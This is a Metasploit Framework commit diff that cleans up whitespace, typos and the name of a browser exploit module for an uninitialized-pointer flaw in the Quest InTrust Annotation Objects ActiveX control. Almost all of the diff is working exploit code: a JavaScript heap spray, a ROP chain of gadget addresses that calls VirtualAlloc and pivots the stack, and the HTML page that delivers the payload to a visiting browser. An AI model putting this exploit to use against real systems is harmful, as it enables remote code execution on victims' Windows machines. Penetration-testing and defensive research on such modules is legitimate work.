Module rename. Cleanup whitespace. Fix typos.

unstable
sinn3r 2012-04-12 01:30:01 -05:00
parent 14f85e406f
commit 0d739a1a51
1 changed files with 54 additions and 55 deletions


@ -1,12 +1,8 @@
##
# $Id$
##
###
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
# http://metasploit.com/framework/
##
require 'msf/core'
@ -18,32 +14,31 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super( update_info(info,
'Name' => 'Quest InTrust Annotation Objects uninitialized pointer remote code execution',
'Name' => 'Quest InTrust Annotation Objects Uninitialized Pointer',
'Description' => %q{
This module exploits a uninitialized variable vulnerability in the
This module exploits an uninitialized variable vulnerability in the
Annotation Objects ActiveX component. The activeX component loads into memory without
opting into ALSR so this module exploits the vulnerability against windows Vista and
Windows 7 targets. A large heap spray is required to fulfil the requirement that EAX
points to part of the rop chain in a heap chunk and the calculated call will hit the
pivot in a seperate heap chunk. This will take some time in the users browser.
Windows 7 targets. A large heap spray is required to fulfill the requirement that EAX
points to part of the ROP chain in a heap chunk and the calculated call will hit the
pivot in a separate heap chunk. This will take some time in the users browser.
},
'License' => MSF_LICENSE,
'Author' =>
[
'rgod <rgod[at]autistici.org>', # initial discovery & poc
'mr_me <steventhomasseeley[at]gmail.com>', # msf module
'rgod <rgod[at]autistici.org>', # initial discovery & poc
'mr_me <steventhomasseeley[at]gmail.com>' # msf module
],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '80662'],
[ 'BID', '52765'],
[ 'URL', 'http://www.exploit-db.com/exploits/18674/'],
[ 'URL', 'http://www.exploit-db.com/exploits/18674/']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
'InitialAutoRunScript' => 'migrate -f'
},
'Payload' =>
{
@ -114,8 +109,6 @@ class Metasploit3 < Msf::Exploit::Remote
end
end
print_status("Target selected: #{my_target.name}") if datastore['VERBOSE']
# Re-generate the payload.
return if ((p = regenerate_payload(cli)) == nil)
@ -141,6 +134,7 @@ class Metasploit3 < Msf::Exploit::Remote
memory = new Array();
for (i=0;i<1000;i++){ memory[i] = block+shellcode; }
}
function main(){
heapspray();
#{obj_name}.Add(#{my_target.ret},1);
@ -156,39 +150,39 @@ class Metasploit3 < Msf::Exploit::Remote
junk,
junk,
junk,
0x44014075 # xchg eax,esp ; add [ecx],10 ; retn 8 (pivot)
0x44014075 # xchg eax,esp ; add [ecx],10 ; retn 8 (pivot)
].pack('V*')
rop_gadgets << [0x44015CEF].pack('V*') * 140 # padding of retn's
rop_gadgets << [
0x44015CEF, # retn
0x44015CEF, # retn
0x44015CEF, # retn
0x44015cee, # pop edx ; retn
0x4401a130, # ptr to &VirtualAlloc() (IAT)
0x44015ca4, # mov eax,[edx+4] ; retn
0x44001218, # push eax ; dec eax ; pop esi ; pop ebp ; retn 14
junk, # filler (compensate)
0x440159bb, # pop ebp ; retn
junk, # filler (retn offset compensation)
junk, # filler (retn offset compensation)
junk, # filler (retn offset compensation)
junk, # filler (retn offset compensation)
0x4400238A, # filler (pop edi ; pop esi ; pop ebp ; retn)
0x440012c1, # push esp ; ret 08
0x44016264, # pop ebx ; retn
0x00004000, # 0x00000001-> ebx
0x44015cc9, # pop edx ; retn
0x00001000, # 0x00001000-> edx
0x44017664, # pop ecx ; retn
0x00000040, # 0x00000040-> ecx
0x44017bd8, # pop edi ; retn
0x44017ebe, # retn
0x4400bf25, # pop eax ; retn
0x0C0C2478, # pointer+0x0c to pop edi ; pop esi ; pop ebp ; retn
0x44005C57, # pushad ; push 8 ; push ecx; push esi; call [eax+c]
0x90909090, # nops, do not change as it changes the offset
0x44015CEF, # retn
0x44015CEF, # retn
0x44015CEF, # retn
0x44015cee, # pop edx ; retn
0x4401a130, # ptr to &VirtualAlloc() (IAT)
0x44015ca4, # mov eax,[edx+4] ; retn
0x44001218, # push eax ; dec eax ; pop esi ; pop ebp ; retn 14
junk, # filler (compensate)
0x440159bb, # pop ebp ; retn
junk, # filler (retn offset compensation)
junk, # filler (retn offset compensation)
junk, # filler (retn offset compensation)
junk, # filler (retn offset compensation)
0x4400238A, # filler (pop edi ; pop esi ; pop ebp ; retn)
0x440012c1, # push esp ; ret 08
0x44016264, # pop ebx ; retn
0x00004000, # 0x00000001-> ebx
0x44015cc9, # pop edx ; retn
0x00001000, # 0x00001000-> edx
0x44017664, # pop ecx ; retn
0x00000040, # 0x00000040-> ecx
0x44017bd8, # pop edi ; retn
0x44017ebe, # retn
0x4400bf25, # pop eax ; retn
0x0C0C2478, # pointer+0x0c to pop edi ; pop esi ; pop ebp ; retn
0x44005C57, # pushad ; push 8 ; push ecx; push esi; call [eax+c]
0x90909090, # nops, do not change as it changes the offset
0x90909090,
0x90909090,
0x90909090,
@ -211,15 +205,19 @@ class Metasploit3 < Msf::Exploit::Remote
var data = payload;
while(data.length < 100000) { data += data; }
var onemeg = data.substr(0, 64*1024/2);
for (i=0; i<14; i++) {
onemeg += data.substr(0, 64*1024/2);
}
for (i=0; i<14; i++) {
onemeg += data.substr(0, 64*1024/2);
}
onemeg += data.substr(0, (64*1024/2)-(38/2));
var block = new Array();
for (i=0; i<700; i++) {
block[i] = onemeg.substr(0, onemeg.length);
}
for (i=0; i<700; i++) {
block[i] = onemeg.substr(0, onemeg.length);
}
}
function main(){
heapspray();
#{obj_name}.Add(#{my_target.ret},1);
@ -245,7 +243,8 @@ class Metasploit3 < Msf::Exploit::Remote
</html>
EOF
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
peer = "#{cli.peerhost.ljust(16)} #{self.shortname}"
print_status("#{peer} Sending HTML...")
#Remove the extra tabs from content
content = content.gsub(/^\t\t/, '')